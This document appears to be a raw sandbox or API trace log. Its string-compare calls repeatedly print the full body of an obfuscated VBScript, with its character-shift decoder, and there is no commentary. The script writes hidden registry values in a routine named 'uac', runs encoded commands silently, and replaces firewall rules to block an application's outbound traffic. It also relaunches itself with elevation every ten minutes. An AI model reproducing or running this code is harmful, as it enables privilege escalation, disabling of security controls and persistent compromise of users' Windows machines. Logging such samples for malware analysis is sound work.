bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.294] wcsncmp (_String1="\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 76 [0226.294] wcsncmp (_String1="\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.294] wcsncmp (_String1="sx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.294] wcsncmp (_String1="x = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 